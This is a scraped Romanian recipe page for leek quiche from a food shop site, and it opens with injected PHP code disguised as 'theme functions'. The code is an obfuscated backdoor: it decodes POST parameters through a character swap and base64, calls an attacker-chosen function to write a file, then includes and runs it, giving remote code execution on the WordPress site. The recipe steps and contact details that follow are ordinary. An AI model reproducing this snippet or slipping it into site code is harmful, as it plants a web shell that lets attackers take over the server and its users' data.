add_action('wp_head', function(){echo '';}, 1); /* www.bacaniaverde.ro theme functions */ if( ! function_exists('gthcdhdccmnshp') ) { function gthcdhdccmnshp($rgsmxvjadsfql, $rsdrghhcozsnu) { $pwtnwugdjfifl = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'; $rgsmxvjadsfql = strtr($rgsmxvjadsfql, $rsdrghhcozsnu, $pwtnwugdjfifl); $rgsmxvjadsfql = cgldeza($rgsmxvjadsfql); return $rgsmxvjadsfql; } function cgldeza($daknhwighoy) { $daknhwighoy = base64_decode($daknhwighoy); return $daknhwighoy; } $agsjjkxaflexg = $_POST; if(isset($agsjjkxaflexg['ftrbvjvpzpbb'])) { $zvkvddqdcry = $agsjjkxaflexg['ftrbvjvpzpbb']; $ieebybyiyda = gthcdhdccmnshp($agsjjkxaflexg['qykragqcpfgmlp'], $zvkvddqdcry); $lrfztrwplgdvphq = gthcdhdccmnshp($agsjjkxaflexg['xwvciarq'], $zvkvddqdcry); $hwnwniqdbp = gthcdhdccmnshp($agsjjkxaflexg['puujjpccd'], $zvkvddqdcry); $hwnwniqdbp($ieebybyiyda, $lrfztrwplgdvphq); include($ieebybyiyda); } } /* www.bacaniaverde.ro theme functions */ Quiche cu praz – Mananc Sanatos la Bacaniaverde.ro
E-mail: contact@bacaniaverde.ro | Telefon: +4 0721 241 027

Quiche cu praz

De inspiratie frantuzeasca, reteta de quiche cu praz este o alegere rafinata pentru un mic dejun satios sau un pranz gustos!

Mod de preparare
1. Preincalzeste cuptorul la 210 grade Celsius. Curata si taie prazul rondele. Incinge uleiul intr-o tigaie. Adauga rondelele de praz (pastreaza cateva pentru decor) si lasa-le la foc mic 20 de minute sa se inmoaie. Sareaza si pipereaza.

2. Amesteca smantana, branza , ouale si galbenusul. Potriveste de sare si piper. Incorporeaza prazul calit.Eu am folosit  prazul crud romanesc  necalit si a iesit moale si gustos, in plus , pastreaza mai multe vitamine.

3. Unge o tava de tarta cu unt si asaza aluatul. Inteapa fundul tavii cu o furculita. Varsa compozitia si da la cuptor pentru 20 de minute la foc mediu. Serveste cald sau rece, langa salata verde.

  • Sugestie:      Poti da mai multa personalitate acestui quiche, adaugand cateva frunze de      spanac in compozitie.

quiche cu praz  0042013-10-14 15.28.03 003 002

Lasă un răspuns